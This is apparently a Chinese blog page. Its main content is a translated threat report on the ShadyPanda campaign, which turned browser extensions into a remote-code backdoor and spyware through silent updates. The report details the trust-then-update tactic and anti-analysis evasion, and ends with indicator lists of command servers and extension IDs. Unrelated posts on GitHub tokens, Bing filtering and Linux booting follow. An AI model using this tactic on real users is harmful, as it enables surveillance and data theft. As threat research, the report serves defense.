Koi 的研究人员发现了一个名为 ShadyPanda 的威胁组织——他们发起并维持了一场持续七年的浏览器扩展活动，已感染约 430 万名 Chrome 与 Edge 用户。

我们的调查揭示了两个仍然活跃的行动：

一个约 30 万用户的 RCE（远程代码执行）后门：五个扩展在多年合法运营后于 2024 年中期被武器化，其中包括曾被标记为“Featured”（精选）和“Verified”（已验证）的 Clean Master。这些扩展每小时都会运行远程代码执行框架——下载并执行具有完整浏览器访问权限的任意 JavaScript。它们监控每次网站访问，窃取经过加密的浏览历史，并收集完整的浏览器指纹。
一个约 400 万用户的间谍软件行动：来自同一发行商的另外五个扩展（其中 WeTab 单独安装量约 300 万）正在积极收集每次访问的 URL、搜索查询与鼠标点击等数据，并将这些数据传回位于中国的服务器。

ShadyPanda 的一些扩展曾被 Google 推荐和验证，从而获得了即时信任和大规模分发。七年来，该组织学会了如何武器化浏览器市场——建立信任、积累用户，并通过静默更新进行攻击。

阶段 1：壁纸骗局（145 个扩展）

ShadyPanda 的第一次活动简单但规模庞大，发生在 2023 年。共有 145 个扩展，分布在两个市场——Chrome 网上应用店有 20 个，发布商为 nuggetsno15；Microsoft Edge 有 125 个，发布商为 rocket Zhang。所有这些都伪装成壁纸或生产力应用程序。

这波攻击是一次简单的联盟营销欺诈（affiliate fraud）。每当用户点击 eBay、Amazon 或 Booking.com 时，ShadyPanda 的扩展会悄悄注入联盟跟踪代码，从而在每次购买中获得隐藏佣金。这些扩展还部署了 Google Analytics 跟踪，以便把浏览数据货币化——每次网站访问、搜索查询与点击模式都被记录并出售。

这个阶段并不复杂，但很成功，ShadyPanda 学到了三个重要的教训：

Chrome 的审核过程侧重于初次提交，而非持续行为
用户信任安装量高且评价积极的扩展
耐心是值得的——有些扩展在被检测到之前运行了数月。你看起来越合法，造成的损害就越大。

阶段 2：搜索劫持演变

ShadyPanda 变得更大胆了。下一波攻击发生在 2024 年初，从被动货币化转向主动浏览器控制。

Infinity V+ 是这一阶段的典型例子。它伪装成新标签页类的生产力工具，但劫持了若干核心浏览器功能：

搜索重定向：每次网络搜索都会通过 trovi.com（一个已知的浏览器劫持者）进行重定向。搜索查询会被记录、货币化并出售，搜索结果也被篡改以牟利。
Cookie 窃取：扩展程序读取特定域的 Cookie，并将跟踪数据发送到 nossl.dergoodting.com。创建了唯一的标识符来监控浏览活动。所有这些都未经同意或披露。
搜索查询收集：搜索框中的每个按键都会发送到外部服务器（s-85283.gotocdn[.]com 和 s-82923.gotocdn[.]com）。在你按下回车键之前，它们就能实时分析用户兴趣。扩展会捕获部分查询、拼写错误与更正，从而构建出你思考搜索问题时的细粒度轨迹。所有这些流量通过未加密的 HTTP 连接传输，使数据容易被拦截和货币化。这不仅记录你搜索的内容，还记录你如何思考搜索。

ShadyPanda 正在学习并变得更具侵略性。但他们仍然被抓住了。扩展程序在部署后的几周或几个月内就被报告并移除。

他们需要一个更好的策略。

阶段 3：长期博弈

五个扩展。其中三个在 2018-2019 年上传——包括拥有 20 万以上安装量的 Clean Master。所有这些都合法运营多年，获得了特色和验证状态。

策略：建立信任，积累用户，然后通过一次更新进行武器化。

在武器化之前，ShadyPanda 部署了隐蔽的安装追踪来优化分发策略——这是一次数据驱动的恶意软件开发过程。

2024 年中期：在积累了约 30 万个安装后，ShadyPanda 推送了恶意更新。借助 Chrome 与 Edge 的受信任自动更新机制，用户自动被感染。所有五个扩展随后都开始运行相同的恶意代码。

远程代码执行：定时任务

每台受感染的浏览器都会运行一个远程代码执行框架。该框架每小时轮询 api.extensionplay[.]com，获取新指令，下载任意 JavaScript 并以完整的浏览器 API 权限执行。

这并非功能固定的恶意软件，而是一个后门。ShadyPanda 决定其行为。今天可能是监视，明天就可能是勒索软件、凭证窃取或企业间谍活动。更新机制自动运行，每小时一次，永不停歇。

完整的浏览器监控

当前的有效载荷监控每次网站访问，并将加密数据窃取到 ShadyPanda 的服务器：

被收集/窃取的数据包括：

每次访问的 URL，包含完整的浏览历史
显示导航模式的 HTTP 引用者
用于活动分析的时间戳
持久的 UUIDv4 标识（存储于 chrome.storage.sync，可跨设备同步）
完整的浏览器指纹：用户代理、语言、平台、屏幕分辨率、时区
所有数据在发送到 api.cleanmasters.store 之前都经过 AES 加密

规避与攻击能力

反分析：恶意代码会检测到开发者工具的打开并切换为良性行为以规避分析。代码高度混淆（变量名被缩短），并通过一个约 158KB 的 JavaScript 解释器执行以规避内容安全策略（CSP）。
中间人攻击：通过 service worker 可拦截和修改网络请求，用恶意脚本替换合法的 JavaScript 文件，从而实施凭证窃取、会话劫持，甚至向任意网站（包括 HTTPS 站点）注入内容。

ShadyPanda 可以每小时更新其中任何一项功能。尽管这些扩展最近已从应用商店中移除，但其全面攻击的基础设施仍部署在所有受感染的浏览器上。

阶段 4：间谍软件帝国（5 个扩展，400 万以上用户）

然而，ShadyPanda 最重要的行动并非 Clean Master。Edge 版 Clean Master 的同一发行商 Starlab Technology 于 2023 年左右在 Microsoft Edge 上推出了另外 5 个扩展，累计安装量超过 400 万。

问题在于：所有 5 个扩展仍在 Microsoft Edge 市场中活跃。与第三阶段被移除的扩展不同，这个针对 400 万用户的监控操作目前仍在进行中。

其中两个是全面的间谍软件。旗舰产品 WeTab 新标签页（WeTab New Tab Page）仅一个就拥有 300 万安装量，它伪装成一个生产力工具，却是一个复杂的监控平台。

全面数据收集

WeTab 收集并将大量用户数据窃取到 17 个不同的域（中国的 8 个百度服务器、中国的 7 个 WeTab 服务器和 Google Analytics）：

收集的内容：

每次访问的 URL——完整的浏览历史实时传输
所有搜索查询——对用户搜索内容的按键级别监控
像素级精度的鼠标点击跟踪——X/Y 坐标和元素识别
浏览器指纹识别——屏幕分辨率、语言、时区、用户代理
页面交互数据——页面停留时间、滚动行为、活跃浏览时间
存储访问——读取 localStorage、sessionStorage，并可访问所有 cookie

第四阶段的规模远超 Clean Master 行动：感染用户达 400 万，而后者仅为 30 万。这些扩展仍在 Microsoft Edge 市场中活跃——它们已经拥有危险的权限，包括访问所有 URL 和 cookie，用户现在仍在下载它们。ShadyPanda 可以随时推送更新，利用第三阶段相同的 RCE 后门框架，或者更糟糕的东西，来武器化这 400 万个浏览器。基础设施已就位。权限已授予。更新机制自动运行。

七年利用

ShadyPanda 的成功不仅仅在于技术上的复杂性。它在于七年来系统地利用了同一个漏洞：应用商店在提交时审查扩展。它们不会监控批准后发生的事情。

将所有这些活动联系在一起的是：代码签名相似性、重叠的基础设施、随着时间演变而相同的混淆技术。同一个行为者。不同的伪装。每个阶段都从上一个阶段中学习——从粗糙的联盟欺诈到耐心的五年运营。

自动更新机制——旨在确保用户安全——变成了攻击向量。Chrome 和 Edge 受信任的更新管道悄无声息地向用户分发恶意软件。没有网络钓鱼。没有社会工程。只有带有静默版本更新的受信任扩展，将生产力工具变成了监控平台。

ShadyPanda 控制着接下来会发生什么：会话劫持、凭证收集、账户接管、通过受损开发者进行的供应链攻击。对于企业而言，受感染的开发者工作站意味着代码库被入侵和 API 密钥被盗。基于浏览器的 SaaS 平台、云控制台和内部工具的身份验证意味着每次登录对 ShadyPanda 都是可见的。扩展绕过了传统的安全控制。ShadyPanda 已在您的网络中潜伏了一年多。

系统性问题不仅仅是一个恶意行为者。而是安全模型鼓励了这种行为：

构建合法的东西
通过审查并获得信任信号（安装量、评论、验证徽章）
积累庞大的用户群
通过更新进行武器化
在被检测到之前获利

ShadyPanda 证明了这种方法是有效的。现在，每个老练的威胁行为者都知道这个套路。

最终思考

一个耐心的威胁行为者和一个教训：信任是脆弱点。

ShadyPanda 证明，市场仍然以七年前的方式审查扩展——提交时进行静态分析，批准后信任，没有持续监控。Clean Master 合法运营了五年。静态分析无法捕捉到这一点。

这篇报告由 Koi Security 的研究团队撰写。

Koi 就是为此而生：对团队从市场获取的扩展进行行为分析与风险评分。我们关注的是扩展安装后的实际行为，而不是其宣称的功能。

威胁指标（IOCS）

C&C 域：

extensionplay[.]com
yearnnewtab[.]com
api.cgatgpt[.]net

窃取域：

dergoodting[.]com
yearnnewtab[.]com
cleanmasters[.]store
s-85283.gotocdn[.]com
s-82923.gotocdn[.]com

Chrome 扩展：

eagiakjmjnblliacokhcalebgnhellfi
ibiejjpajlfljcgjndbonclhcbdcamai
ogjneoecnllmjcegcfpaamfpbiaaiekh
jbnopeoocgbmnochaadfnhiiimfpbpmf
cdgonefipacceedbkflolomdegncceid
gipnpcencdgljnaecpekokmpgnhgpela
bpgaffohfacaamplbbojgbiicfgedmoi
ineempkjpmbdejmdgienaphomigjjiej
nnnklgkfdfbdijeeglhjfleaoagiagig
Mljmfnkjmcdmongjnnnbbnajjdbojoci
llkncpcdceadgibhbedecmkencokjajg
nmfbniajnpceakchicdhfofoejhgjefb
ijcpbhmpbaafndchbjdjchogaogelnjl
olaahjgjlhoehkpemnfognpgmkbedodk
gnhgdhlkojnlgljamagoigaabdmfhfeg
cihbmmokhmieaidfgamioabhhkggnehm
lehjnmndiohfaphecnjhopgookigekdk
hlcjkaoneihodfmonjnlnnfpdcopgfjk
hmhifpbclhgklaaepgbabgcpfgidkoei
lnlononncfdnhdfmgpkdfoibmfdehfoj
nagbiboibhbjbclhcigklajjdefaiidc
ofkopmlicnffaiiabnmnaajaimmenkjn
ocffbdeldlbilgegmifiakciiicnoaeo
eaokmbopbenbmgegkmoiogmpejlaikea
lhiehjmkpbhhkfapacaiheolgejcifgd
ondhgmkgppbdnogfiglikgpdkmkaiggk
imdgpklnabbkghcbhmkbjbhcomnfdige

Edge 附加组件：

bpelnogcookhocnaokfpoeinibimbeff
enkihkfondbngohnmlefmobdgkpmejha
hajlmbnnniemimmaehcefkamdadpjlfa
aadnmeanpbokjjahcnikajejglihibpd
ipnidmjhnoipibbinllilgeohohehabl
fnnigcfbmghcefaboigkhfimeolhhbcp
nlcebdoehkdiojeahkofcfnolkleembf
fhababnomjcnhmobbemagohkldaeicad
nokknhlkpdfppefncfkdebhgfpfilieo
ljmcneongnlaecabgneiippeacdoimaa
onifebiiejdjncjpjnojlebibonmnhog
dbagndmcddecodlmnlcmhheicgkaglpk
fmgfcpjmmapcjlknncjgmbolgaecngfo
kgmlodoegkmpfkbepkfhgeldidodgohd
hegpgapbnfiibpbkanjemgmdpmmlecbc
gkanlgbbnncfafkhlchnadcopcgjkfli
oghgaghnofhhoolfneepjneedejcpiic
fcidgbgogbfdcgijkcfdjcagmhcelpbc
nnceocbiolncfljcmajijmeakcdlffnh
domfmjgbmkckapepjahpedlpdedmckbj
cbkogccidanmoaicgphipbdofakomlak
bmlifknbfonkgphkpmkeoahgbhbdhebh
ghaggkcfafofhcfppignflhlocmcfimd
hfeialplaojonefabmojhobdmghnjkmf
boiciofdokedkpmopjnghpkgdakmcpmb
ibfpbjfnpcgmiggfildbcngccoomddmj
idjhfmgaddmdojcfmhcjnnbhnhbmhipd
jhgfinhjcamijjoikplacnfknpchndgb
cgjgmbppcoolfkbkjhoogdpkboohhgel
afooldonhjnhddgnfahlepchipjennab
fkbcbgffcclobgbombinljckbelhnpif
fpokgjmlcemklhmilomcljolhnbaaajk
hadkldcldaanpomhhllacdmglkoepaed
iedkeilnpbkeecjpmkelnglnjpnacnlh
hjfmkkelabjoojjmjljidocklbibphgl
dhjmmcjnajkpnbnbpagglbbfpbacoffm
cgehahdmoijenmnhinajnojmmlnipckl
fjigdpmfeomndepihcinokhcphdojepm
chmcepembfffejphepoongapnlchjgil
googojfbnbhbbnpfpdnffnklipgifngn
fodcokjckpkfpegbekkiallamhedahjd
igiakpjhacibmaichhgbagdkjmjbnanl
omkjakddaeljdfgekdjebbbiboljnalk
llilhpmmhicmiaoancaafdgganakopfg
nemkiffjklgaooligallbpmhdmmhepll
papedehkgfhnagdiempdbhlgcnioofnd
glfddenhiaacfmhoiebfeljnfkkkmbjb
pkjfghocapckmendmgdmppjccbplccbg
gbcjipmcpedgndgdnfofbhgnkmghoamm
ncapkionddmdmfocnjfcfpnimepibggf
klggeioacnkkpdcnapgcoicnblliidmf
klgjbnheihgnmimajhohfcldhfpjnahe
acogeoajdpgplfhidldckbjkkpgeebod
ekndlocgcngbpebppapnpalpjfnkoffh
elckfehnjdbghpoheamjffpdbbogjhie
dmpceopfiajfdnoiebfankfoabfehdpn
gpolcigkhldaighngmmmcjldkkiaonbg
dfakjobhimnibdmkbgpkijoihplhcnil
hbghbdhfibifdgnbpaogepnkekonkdgc
fppchnhginnfabgenhihpncnphhafmac
ghhddclfklljabeodmcejjjlhoaaiban
bppelgkcnhfkicolffhlkbdghdnjdkhi
ikgaleggljchgbihlaanjbkekmmgccam
bdhjinjoglaijpffoamhhnhooeimgoap
fjioinpkgmlcioajfnncgldldcnabffe
opncjjhgbllenobgbfjbblhghmdpmpbj
cbijiaccpnkbdpgbmiiipedpepbhioel
fbbmnieefocnacnecccgmedmcbhlkcpm
hmbacpfgehmmoloinfmkgkpjoagiogai
paghkadkhiladedijgodgghaajppmpcg
bafbmfpfepdlgnfkgfbobplkkaoakjcl
kcpkoopmfjhdpgjohcbgkbjpmbjmhgoi
jelgelidmodjpmohbapbghdgcpncahki
lfgakdlafdenmaikccbojgcofkkhmolj
hdfknlljfbdfjdjhfgoonpphpigjjjak
kpfbijpdidioaomoecdbfaodhajbcjfl
fckphkcbpgmappcgnfieaacjbknhkhin
lhfdakoonenpbggbeephofdlflloghhi
ljjngehkphcdnnapgciajcdbcpgmpknc
ejfocpkjndmkbloiobcdhkkoeekcpkik
ccdimkoieijdbgdlkfjjfncmihmlpanj
agdlpnhabjfcbeiempefhpgikapcapjb
mddfnhdadbofiifdebeiegecchpkbgdb
alknmfpopohfpdpafdmobclioihdkhjh
hlglicejgohbanllnmnjllajhmnhjjel
iaccapfapbjahnhcmkgjjonlccbhdpjl
ehmnkbambjnodfbjcebjffilahbfjdml
ngbfciefgjgijkkmpalnmhikoojilkob
laholcgeblfbgdhkbiidbpiofdcbpeeo
njoedigapanaggiabjafnaklppphempm
fomlombffdkflbliepgpgcnagolnegjn
jpoofbjomdefajdjcimmaoildecebkjc
nhdiopbebcklbkpfnhipecgfhdhdbfhb
gdnhikbabcflemolpeaaknnieodgpiie
bbdioggpbhhodagchciaeaggdponnhpa
ikajognfijokhbgjdhgpemljgcjclpmn
lmnjiioclbjphkggicmldippjojgmldk
ffgihbmcfcihmpbegcfdkmafaplheknk
lgnjdldkappogbkljaiedgogobcgemch
hiodlpcelfelhpinhgngoopbmclcaghd
mnophppbmlnlfobakddidbcgcjakipin
jbajdpebknffiaenkdhopebkolgdlfaf
ejdihbblcbdfobabjfebfjfopenohbjb
ikkoanocgpdmmiamnkogipbpdpckcahn
ileojfedpkdbkcchpnghhaebfoimamop
akialmafcdmkelghnomeneinkcllnoih
eholblediahnodlgigdkdhkkpmbiafoj
ipokalojgdmhfpagmhnjokidnpjfnfik
hdpmmcmblgbkllldbccfdejchjlpochf
iphacjobmeoknlhenjfiilbkddgaljad
jiiggekklbbojgfmdenimcdkmidnfofl
gkhggnaplpjkghjjcmpmnmidjndojpcn
opakkgodhhongnhbdkgjgdlcbknacpaa
nkjomoafjgemogbdkhledkoeaflnmgfi
ebileebbekdcpfjlekjapgmbgpfigled
oaacndacaoelmkhfilennooagoelpjop
ljkgnegaajfacghepjiajibgdpfmcfip
hgolomhkdcpmbgckhebdhdknaemlbbaa
bboeoilakaofjkdmekpgeigieokkpgfn
dkkpollfhjoiapcenojlmgempmjekcla
emiocjgakibimbopobplmfldkldhhiad
nchdmembkfgkejljapneliogidkchiop
lljplndkobdgkjilfmfiefpldkhkhbbd
hofaaigdagglolgiefkbencchnekjejl
hohobnhiiohgcipklpncfmjkjpmejjni
jocnjcakendmllafpmjailfnlndaaklf
bjdclfjlhgcdcpjhmhfggkkfacipilai
ahebpkbnckhgjmndfjejibjjahjdlhdb
enaigkcpmpohpbokbfllbkijmllmpafm
bpngofombcjloljkoafhmpcjclkekfbh
cacbflgkiidgcekflfgdnjdnaalfmkob
ibmgdfenfldppaodbahpgcoebmmkdbac

其他报道

github Fine-grained personal access token 使用

2025-11-27T16:00:00.000Z

使用之前创建的 github Fine-grained personal access token 修改仓库文件时报错403,发现用owner为个人用户名的token无法修改组织下仓库的文件.

这是我的用户名 yiGmMk ,这个用户下的仓库使用该token可以正常修改文件.

原因

创建token可以指定owner,如果需要修改组织下的仓库文件,需要创建一个owner为组织名的token.

如下,需创建owner为programnotes-cn的token才能修改该组织下的仓库文件:

配置地址,https://github.com/settings/personal-access-tokens

2种方案

github 个人的 Fine-grained Personal Access Token (细粒度令牌) 是可以修改组织（Organization）名下仓库文件的

方案一：使用 Fine-grained Token

推荐，更安全，但需要配置

资源所有者（Resource Owner）必须选对：
在创建 Token 时，“Resource owner” 不能选你自己（你的用户名），必须从下拉菜单中选择那个组织。
- 注意：如果你在下拉菜单里看不到那个组织，说明该组织禁止了非管理员创建细粒度 Token，或者你需要先在组织设置里开启。
组织管理员必须批准（Policy）：
很多组织默认是禁止细粒度 Token 访问私有仓库的。
- 你需要联系组织的 Owner/Admin，进入 Organization Settings -> Third-party access -> Personal access tokens -> Settings。
- 确保选择了 “Allow access via fine-grained personal access tokens”。
权限设置（Permissions）：
在 Repository permissions 中，你必须显式开启：
- Contents: Read and write (这是修改文件必须的)
- Metadata: Read-only (默认必选)

方案二：使用 Personal Access Token (Classic)（最简单，成功率高）

如果方案一太麻烦（比如你不是管理员，且不想麻烦管理员去改设置），最直接的方法是换回 Classic Token。

操作步骤：

进入 GitHub Settings -> Developer settings。
选择 Personal access tokens -> Tokens (classic)。
点击 Generate new token (classic)。
关键步骤：
- Scopes (权限范围)：勾选整个 repo 复选框（包含 repo:status, public_repo 等）。这将赋予该 Token 对你拥有权限的所有仓库（包括组织仓库）的读写权限。
- SSO 授权 (如果组织开启了 SAML)：Token 创建后，如果你的组织开启了单点登录 (SSO)，你需要点击 Token 旁边的 “Configure SSO” 按钮，并对该组织进行授权（Authorize）。如果不做这一步，Token 即使有权限也无法读写组织资源。

必应搜索屏蔽垃圾网站

2025-11-25T16:00:00.000Z

默认的必应搜索搜索代码相关的信息很多csdn的文章,质量不行,使用 -*.csdn.net过滤掉

默认

搜索coze,默认为:

国内版 https://cn.bing.com/search?q=coze
国际版 https://bing.com/search?q=coze

屏蔽后

国内版 https://cn.bing.com/search?q=coze%20-site:*.csdn.net
国际版 https://bing.com/search?q=coze%20-site:*.csdn.net

配置

使用 Infinity 插件的可以这样配置:

译|Linux 启动过程：从按下电源到内核

2025-11-02T16:00:00.000Z

Part 1 — 从按下电源按钮到内核的第一步

按下电源键，转瞬之间字符瀑布奔涌或 Logo 悄然浮现，Linux 随之亮相。看似魔法，实则是一连串微小代码与CPU之间的精密握手。下文循着这场握手的轨迹，一路追踪到 Linux 内核首行 C 代码的登场。

最初的指令（The very first instruction）

电源稳定后，CPU 会把自己拉回一个迷你而古老的模式——实模式（real mode）。它源自最早的 8086 芯片，规则被故意设计得极其简单：内存地址由寄存器里的一对值拼成，即段（segment）与偏移（offset）：

physical_address = (segment << 4) + offset

你会看到类似 0xFFFFFFF0 的数字，这是十六进制（hex），以 0x 作为前缀。0x10 是 16（十进制），0x100000 是 1MB。十六进制与硬件的位存储非常契合，因此在底层代码中随处可见。

复位后，CPU 跳转到一个特殊地址——复位向量（reset vector）0xFFFFFFF0。你可以将其理解为一个永久书签：“从这里开始”。这个地址的空间极其有限，所以主板厂商通常在那里放一个“远跳转（far jump）”，把控制权交给主板上的固件。

小知识：寄存器（register）是 CPU 内部的一个小槽位，用来暂存当前正在使用的数值。诸如 CS 与 IP 就是寄存器名：CS 表示“代码段（code segment）”，标记当前指令的所在“邻域”；IP 表示“指令指针（instruction pointer）”，标记下一条指令的位置。

BIOS 与 UEFI

固件（firmware）是烧在主板上的一个小型引导程序。

BIOS（Basic Input Output System）属于“老派”做法。一通上电自检（POST）后，它按预设顺序挨个试探设备；只要发现某块磁盘的头 512 字节最后躺着签名 0x55AA，就认定“这货能启动”。于是 BIOS 把这扇区搬到内存 0x7C00，然后跳过去继续执行。扇区容量极小，通常只够再拉一段更大的加载器进来。
UEFI 是现代替代者。它同样负责启动机器，但它可以直接理解文件系统，并能加载更大的引导程序，无需旧式“首扇区”舞步。UEFI 还能向操作系统传递更丰富的信息。路径不同，目标一致：把控制权交给能够加载 Linux 的引导程序。

引导加载器（Meet the bootloader）

引导加载器是把操作系统“请进场”的门童。GRUB 是 PC 上的常见选择。它读取自身配置，显示菜单（如果你配置了），并将 Linux 内核加载到内存中。内核文件实际上包含两部分：

一个仍在实模式下运行的小型 setup 程序；
更大的压缩内核，稍后会被解压。

GRUB 还会往一个叫 setup header 的小结构里填好关键信息：内核被摆在哪、命令行丢在哪、有没有 initrd 等。填完便直接跳去 setup 程序继续干活。

setup 程序建立“安全工作区”（The setup program makes a safe room）

在 Linux 做任何有趣的事前，setup 代码需要创建一个可预测的工作环境：

对齐段寄存器，使得内存拷贝行为每次都一致。这里你会看到 CS（代码段）、DS（数据段）与 SS（栈段）。同时清除一个叫“方向标志”的 CPU 位，让拷贝指令向前移动。
建立栈。栈是一个“后进先出”的工作台，函数在此存放临时值。SS 指定栈所用的段，SP 指向当前栈顶。
清零 BSS。BSS 区域用于存放需要从零开始的全局变量。C 代码假定 BSS 为零，setup 程序会把这个跨度全部写成零以兑现承诺。
如果你在内核命令行传了 earlyprintk，setup 代码还会编程串口以打印非常早期的消息——当图形尚未就绪时尤为有用。
最后，setup 程序向固件询问“我们到底有多少可用 RAM，以及空洞在哪里”。在传统 BIOS 上，这个调用常被昵称为 e820，它返回一份简单的可用与保留范围列表。内核会用这份列表来避免踩到固件的脚趾。

完成这些后，setup 代码调用它的第一个 C 函数，名字就叫 main。此时我们仍在这个古老而小巧的实模式中……

Part 2 — 离开实模式，踏过 32 位，抵达 64 位

现代 Linux 在 PC 上运行于 long mode（64 位，x86_64）。你无法从实模式(real mode) 直接跳到 long mode，路径是：real mode → protected mode → long mode。本部分解释这条路径与相关术语。

Protected mode（保护模式），尽量不拗口

保护模式是为摆脱 1980 年代限制而引入的 32 位世界，它增加两件核心工具：

GDT（Global Descriptor Table，全局描述符表）：一张短短的段描述列表。每一项描述“该段从哪里开始、覆盖多大范围、允许做什么”。Linux 保持简单，采用扁平模型（flat model）：基址为 0，大小覆盖整个 32 位空间。扁平后，地址看起来又像普通数字。
IDT（Interrupt Descriptor Table，中断描述符表）：一份“紧急呼叫”的目录。若有中断到来，CPU 在 IDT 中查找并跳到登记的处理程序。切换过程中我们先加载一个极小的占位 IDT，因为即将屏蔽中断；真正的、功能完整的 IDT 在进入“真实内核”后才安装。

谨慎的切换（The careful switch）

setup 代码先把“吵闹”部分关掉：用一条指令禁用可屏蔽中断（maskable interrupts），让老式 PIC 芯片安静，以确保硬件中断暂时完全被阻断；打开 A20 line（历史性开关），避免地址在 1MB 处环回；重置数学协处理器，让浮点状态干净。

随后加载一个仅含必需项的迷你 GDT 与迷你 IDT。最终在 CR0 中设置 PE 位（Protected Mode Enable），并执行一次 far jump。这个跳转会从 GDT 重新加载代码段，锁定进入 protected mode；同时重载数据段与栈段，并修正栈指针以匹配新的扁平世界。

我们现在处于 32 位的 protected mode。

小知识：控制寄存器（control registers）

CR0：打开 protected mode 的总开关。
CR3：指向页表顶层的地址，我们马上会用到。
CR4：启用扩展特性，例如更大的页表项（包括 PAE）。

为什么还没有结束

Linux 想要的是 64 位，也就是 long mode。还需要两件事：

必须开启 Paging（分页）。分页是虚拟地址与物理地址之间的翻译器。程序使用虚拟地址，硬件读写物理内存。页表以固定大小的页（典型 4KB）进行映射。早期启动时，内核常用 2MB 大页来快速描述低端内存。
在 EFER（一个 model-specific register，模型特定寄存器）中设置名为 LME 的位，以允许 long mode。

构建“恰到好处”的分页

32 位序幕会建立一套小型页表，表达“在这片区域，虚拟地址等于物理地址”。这叫 identity map（同址映射），足以让分页安全地开启。

为此，代码在 CR4 中启用 PAE，使得使用更大的页表项；构建覆盖低端内存的最小页表，用 2MB 页快速铺设；将顶层页表地址写入 CR3，分页就绪。

最后在 EFER 中设置 LME 位，并通过一次 far return 跳入以 64 位语法编写的标签。long mode 现已激活。段仍旧“扁平”，但地址与寄存器都变为 64 位宽。

为什么要如此小心？在一个活着的系统里切换模式像是在行进中换轮胎。代码先屏蔽打断、准备最小所需的表、再翻转关键位，最后才重新允许中断。稳妥的顺序可以避免半切换的奇怪状态。

Part 3 — 解包真正的内核、修正地址，以及内核为何会“主动搬家”

我们已有 64 位 CPU、Paging 已开启，内存中放着一个压缩的内核。现在由一个小小的 64 位 stub 来做实际工作：如有需要先挪开自己、解包内核、若内核不在默认位置则修正地址，最后跳转。

清出路径并设好安全网

stub 首先搞清楚它到底运行在何处。早期代码在链接时好像自己位于地址 0，运行时再计算真实基址。如果解压后的内核计划目的地会与 stub 重叠，它会先把自己复制到安全位置。

它清零自己的 BSS，让全局状态从干净开始。

它加载一份极简 IDT，仅有两个处理程序：一个处理 page fault（页故障），一个处理 NMI（不可屏蔽中断）。页故障发生在 CPU 试图使用的虚拟地址没有对应映射时。在我们早期的 identity map 世界里，这个小小的页故障处理器可以即时补上缺失的映射并继续运行。NMI 处理器则确保在我们尚在“拉起系统”的阶段，突发的不可屏蔽中断不会让机器崩溃。

同时它还为接下来会触及的区域建立同址映射，包括内核的未来驻留区、由引导加载器填充的 boot parameters（启动参数）页，以及命令行缓冲区。

解压 Linux…

一个常被命名为 extract_kernel 的 C 函数接管。它先划出一小块堆作为临时缓冲；打印那句经典的提示；随后用内核构建时选择的算法进行解压。gzip、xz、zstd、lzo 等都通过同一个包装器接入。

字节解出后，解压器读取内核的 ELF（Executable and Linkable Format）头。ELF 既是文件格式也是地图：哪些是代码、哪些是数据、每块应该确切放到哪里。解压器按图将每个分块拷贝到其归属位置。

如果内核被加载到与其构建时不同的地址，解压器会应用 relocations（重定位）。重定位是对包含地址的指令或指针做的小修正。解压器遍历修正列表，把每个位置补丁到我们实际使用的地址空间中的正确指向。

当一切就绪，解压器返回“真正内核”的入口地址，并跳转过去，同时传入指向启动参数的指针。从那一刻起，你已经进入完整内核。遇到的第一个函数是 start_kernel，大型初始化随即开始。

为什么内核会主动“搬家”（kASLR）

你可能在内核日志中看到过 kASLR（Kernel Address Space Layout Randomization，内核地址空间布局随机化）。核心思想非常直接：如果攻击者不知道内核在内存中的确切位置，某些利用会变得更困难。

在启动早期，若启用了 kASLR，解压器会随机选择两个“基址”：

物理基址：内核字节最终驻留的 RAM 物理地址；
虚拟基址：当完整分页机制建立后，内核使用的起始虚拟地址。

它如何在不“踩雷”的前提下做选择？

先建立一个“勿触列表”，包括解压器自身、压缩镜像、初始内存盘（initrd/initramfs）、启动参数页与命令行缓冲区；如果你在命令行传了 memmap= 选项，所保留的区间也会被纳入其中。
扫描固件提供的内存映射，寻找足够大的空闲区域；对每个空闲区域，计算合适尺寸且对齐的“插槽”数；
使用启动早期可用的熵源生成随机数（在现代 CPU 上可能是硬件随机指令）；将随机数映射到插槽总数，挑选对应的插槽，作为物理基址；
虚拟基址以相同方式选择，但限制在内核的虚拟地址窗口范围内。

如果没有合适的区域可用，代码会回退到默认地址并打印一个小警告；如果你在命令行传了 nokaslr，则会按设计跳过随机化步骤。

术语速览

十六进制（Hexadecimal）：以 0x 作为前缀的 16 进制数。0x10 是 16，0x100000 是 1MB。十六进制与位存储对齐良好，因此底层代码常用。
寄存器（Register）：CPU 内部用于“当下”存数的微小槽位，如 CS、DS、SS、IP、SP。
段与偏移（Segment/Offset）：在实模式中用于构造物理地址的两部分，公式为：physical = segment * 16 + offset。
BIOS：较早的固件风格，负责开机、自检，并把第一个引导扇区加载到内存。
UEFI：现代固件，理解文件系统，可直接加载更大的引导程序。
引导加载器（Bootloader）：把内核放入内存并向其传递系统事实的“门童”，GRUB 很常见。
栈（Stack）：函数使用的“后进先出”工作台。SS 选择其段，SP 指向当前栈顶。
BSS：用于存放必须从零开始的全局变量区域。C 运行前，内核 setup 代码会清零该区域。
中断（Interrupt）：来自硬件或软件的快速“打断”。CPU 暂停、运行小处理程序后恢复。可屏蔽中断允许暂时阻断，NMI 不可。
GDT（全局描述符表）：段描述符的短表。Linux 在早期设置为简单的扁平模型。
IDT（中断描述符表）：中断处理程序的目录。早期启动使用一个极简版本，完整内核稍后安装真正的表。
A20 线（A20 line）：在老式 PC 上必须打开的历史性开关，否则 1MB 以上寻址不正确。
保护模式（Protected mode）：32 位模式，引入 GDT/IDT，并允许分页。
长模式（Long mode）：x86_64 的 64 位模式，要求启用分页，并在 EFER 寄存器中设置 LME 位。
分页（Paging）：将虚拟地址翻译到物理内存的机制，通过页表实现。
页表（Page tables）：映射虚拟页到物理页的数据结构。早期启动常用“同址映射（identity map）”。常规页大小为 4KB，早期启动经常用 2MB 大页以快速覆盖地址空间。
CR0、CR3、CR4：控制寄存器。CR0 打开保护模式；CR3 指向页表顶层；CR4 启用扩展特性如 PAE。
EFER：模型特定寄存器，包含 Long Mode Enable（LME）等位。
ELF：内核的磁盘格式，内置“该放哪里”的结构化映射。
重定位（Relocation）：当代码被加载到不同于其构建基址的位置时用于修正地址的“补丁”。
kASLR：在启动时随机化内核基址以提高利用难度。

作者

订阅 Feed：https://www.0xkato.xyz/feed.xml
网站首页：https://www.0xkato.xyz/
关于作者：https://www.0xkato.xyz/about
X（Twitter）：https://x.com/0xkato

原文

https://www.0xkato.xyz/linux-boot/

独立开发:AI图生图获得第一位付费用户，现在支持在线支付了

2025-11-01T16:00:00.000Z

独立开发的AI图生图工具“即梦”获得了第一位付费用户，并且现在支持在线支付了。

收款方式

最开始为了快速打通，是在定价页面上贴了微信二维码，让用户加群支付，这种方式过于复杂，用户体验也不是很好。

